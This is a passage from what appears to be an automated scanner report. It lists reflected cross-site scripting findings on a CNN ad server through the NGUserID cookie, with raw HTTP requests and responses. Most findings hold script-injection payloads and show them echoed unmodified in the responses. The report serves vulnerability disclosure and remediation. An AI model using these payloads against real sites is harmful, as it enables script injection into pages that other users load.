Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1d0bde"><script>alert(1)</script>e6c2b1c7b30; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:45 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:45 GMT
Pragma: no-cache
Content-Length: 3226
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
17,1067,1285,1589,1678,1686,1735,3450,3615,4408,4443,37359,47128,47457,52263,52901,56058,56872,57896,58702,61263,61887,61908,61913,63267,116729,116771&amp;RawValues=NGUSERID%2Caa55a22-30407-167278533-1d0bde"><script>alert(1)</script>e6c2b1c7b30%2CTIL%2C1313434014105&amp;random=bhhgtwz,bhesAmvdozoty&amp;Params.tag.transactionid=&amp;Params.User.UserID=aa55a22-30407-167278533-1d0bde"%3E%3Cscript%3Ealert(1)%3C%2Fscript%3Ee6c2b1c7b30" width="1"
...[SNIP]...

1.92. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center¶ms.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=78541 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=150x50_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=78541

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c729"><script>alert(1)</script>2ee5bc105c was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=150x50_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=78541 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-19c729"><script>alert(1)</script>2ee5bc105c; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:27 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:27 GMT
Pragma: no-cache
Content-Length: 3557
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
86,917,1067,1285,1589,1678,1686,1735,3450,3615,4409,4443,37359,47128,47457,52263,52901,56058,56872,57896,58702,61263,61887,61908,61913,63267,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-19c729"><script>alert(1)</script>2ee5bc105c%2CTIL%2C1313434014105&Redirect=http://www.money.com">
...[SNIP]...

1.93. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_bot¶ms.styles=fs&tile=1313433990029&page.allowcompete=yes&domId=229469 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=1x1_bot&params.styles=fs&tile=1313433990029&page.allowcompete=yes&domId=229469

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56e12"><script>alert(1)</script>b6c840f1983 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=1x1_bot&params.styles=fs&tile=1313433990029&page.allowcompete=yes&domId=229469 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-156e12"><script>alert(1)</script>b6c840f1983; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:31 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:31 GMT
Pragma: no-cache
Content-Length: 912
Content-Type: text/html

<a target="_blank" href="/event.ng/Type=click&FlightID=4621&AdID=220606&TargetID=1515&Segments=2244,2743,3285,6298,6520,8598,10240,17251,18961,19419,25128,25342,25344,25412,32749,32922,33852,34172,345
...[SNIP]...
682,685,686,917,1067,1285,1589,1678,1686,1735,4443,37359,47128,47457,52263,52901,56058,56872,57896,58683,58702,61263,61887,61908,61913,63267,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-156e12"><script>alert(1)</script>b6c840f1983%2CTIL%2C1313433990029&Redirect=http%3A%2F%2Fwww.cnn.com">
...[SNIP]...

1.94. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_bot¶ms.styles=fs&tile=1313434014105&page.allowcompete=yes&domId=229469 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=1x1_bot&params.styles=fs&tile=1313434014105&page.allowcompete=yes&domId=229469

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3205"><script>alert(1)</script>628c3f0a33e was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=1x1_bot&params.styles=fs&tile=1313434014105&page.allowcompete=yes&domId=229469 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1a3205"><script>alert(1)</script>628c3f0a33e; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:47:44 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:47:44 GMT
Pragma: no-cache
Content-Length: 912
Content-Type: text/html

<a target="_blank" href="/event.ng/Type=click&FlightID=4621&AdID=220606&TargetID=1515&Segments=2244,2743,3285,6298,6520,8598,10240,17251,18961,19419,25128,25342,25344,25412,32749,32922,33852,34172,345
...[SNIP]...
682,685,686,917,1067,1285,1589,1678,1686,1735,4443,37359,47128,47457,52263,52901,56058,56872,57896,58683,58702,61263,61887,61908,61913,63267,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-1a3205"><script>alert(1)</script>628c3f0a33e%2CTIL%2C1313434014105&Redirect=http%3A%2F%2Fwww.cnn.com">
...[SNIP]...

1.95. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_bot¶ms.styles=fs&tile=1313434106153&page.allowcompete=yes&domId=229469 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=1x1_bot&params.styles=fs&tile=1313434106153&page.allowcompete=yes&domId=229469

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cf45"><script>alert(1)</script>3d3023a0a05 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=1x1_bot&params.styles=fs&tile=1313434106153&page.allowcompete=yes&domId=229469 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-13cf45"><script>alert(1)</script>3d3023a0a05; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=CAC; WSOD%5FcompareToCategory=0; WSOD%5FcompareToSP500=0; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:50:21 GMT
Server: Apache
Vary: Cookie
AdServer: ads1ad58:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:50:21 GMT
Pragma: no-cache
Content-Length: 911
Content-Type: text/html

<a target="_blank" href="/event.ng/Type=click&FlightID=4621&AdID=220606&TargetID=1515&Segments=2244,2743,3285,6298,6520,8598,10240,17251,18961,19419,25128,25342,25344,25412,32749,32922,33852,34172,345
...[SNIP]...
,682,685,686,917,1067,1285,1589,1678,1686,1735,4443,37359,47128,47457,52263,52901,56058,56872,57896,58683,58702,61089,61263,61887,61908,61913,63267,116729&RawValues=NGUSERID%2Caa55a22-30407-167278533-13cf45"><script>alert(1)</script>3d3023a0a05%2CTIL%2C1313434106153&Redirect=http%3A%2F%2Fwww.cnn.com">
...[SNIP]...

1.96. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=business_news¶ms.styles=fs&tile=1313434106153&page.allowcompete=yes&domId=84066 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=business_news&params.styles=fs&tile=1313434106153&page.allowcompete=yes&domId=84066

Issue detail

The value of the NGUserID cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 543a2'-alert(1)-'d4f8843d407 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=business_news&params.styles=fs&tile=1313434106153&page.allowcompete=yes&domId=84066 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1543a2'-alert(1)-'d4f8843d407; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=CAC; WSOD%5FcompareToCategory=0; WSOD%5FcompareToSP500=0; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:49:36 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:49:36 GMT
Pragma: no-cache
Content-Length: 3017
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
686,917,1067,1285,1589,1678,1686,1735,3448,4443,37359,47128,47457,52263,52901,56058,56872,57896,58702,58848,61089,61263,61887,61908,61913,63267,116729&amp;RawValues=NGUSERID%2Caa55a22-30407-167278533-1543a2'-alert(1)-'d4f8843d407%2CTIL%2C1313434106153&amp;random=btptulN,bhesAsadoIiib&amp;Params.tag.transactionid=&amp;Params.User.UserID=aa55a22-30407-167278533-1543a2'-alert(1)-'d4f8843d407" width="1" height="1" border="0" />
...[SNIP]...

1.97. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=markets_and_stocks¶ms.styles=fs&tile=1313434014105&page.allowcompete=yes&domId=506627 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=markets_and_stocks&params.styles=fs&tile=1313434014105&page.allowcompete=yes&domId=506627

Issue detail

The value of the NGUserID cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5b1b'-alert(1)-'bffa0fe43f7 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=markets_and_stocks&params.styles=fs&tile=1313434014105&page.allowcompete=yes&domId=506627 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1e5b1b'-alert(1)-'bffa0fe43f7; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:58 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:58 GMT
Pragma: no-cache
Content-Length: 3001
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
86,917,1067,1285,1589,1678,1686,1735,3450,4443,37359,47128,47457,52263,52901,56058,56872,57896,58702,58848,61263,61887,61908,61913,63267,116729,116771&amp;RawValues=NGUSERID%2Caa55a22-30407-167278533-1e5b1b'-alert(1)-'bffa0fe43f7%2CTIL%2C1313434014105&amp;random=byjryjR,bhesAncdoztfu&amp;Params.tag.transactionid=&amp;Params.User.UserID=aa55a22-30407-167278533-1e5b1b'-alert(1)-'bffa0fe43f7" width="1" height="1" border="0" />
...[SNIP]...

1.98. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=technology¶ms.styles=fs&tile=1313433990029&page.allowcompete=yes&domId=411857 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=technology&params.styles=fs&tile=1313433990029&page.allowcompete=yes&domId=411857

Issue detail

The value of the NGUserID cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75248'-alert(1)-'a28f4fd55a9 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=technology&params.styles=fs&tile=1313433990029&page.allowcompete=yes&domId=411857 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-175248'-alert(1)-'a28f4fd55a9; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:01 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:01 GMT
Pragma: no-cache
Content-Length: 2994
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
,685,686,917,1067,1285,1589,1678,1686,1735,3458,4443,37359,47128,47457,52263,52901,56058,56872,58702,58848,61263,61887,61908,61913,63267,116729,116771&amp;RawValues=NGUSERID%2Caa55a22-30407-167278533-175248'-alert(1)-'a28f4fd55a9%2CTIL%2C1313433990029&amp;random=bzfbazy,bhesAljdoyRsg&amp;Params.tag.transactionid=&amp;Params.User.UserID=aa55a22-30407-167278533-175248'-alert(1)-'a28f4fd55a9" width="1" height="1" border="0" />
...[SNIP]...

1.99. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo¶ms.styles=fs&domId=566446&page.allowcompete=yes&domId=566446 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo&params.styles=fs&domId=566446&page.allowcompete=yes&domId=566446

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdb5d"><script>alert(1)</script>fa90414d27d was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo&params.styles=fs&domId=566446&page.allowcompete=yes&domId=566446 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
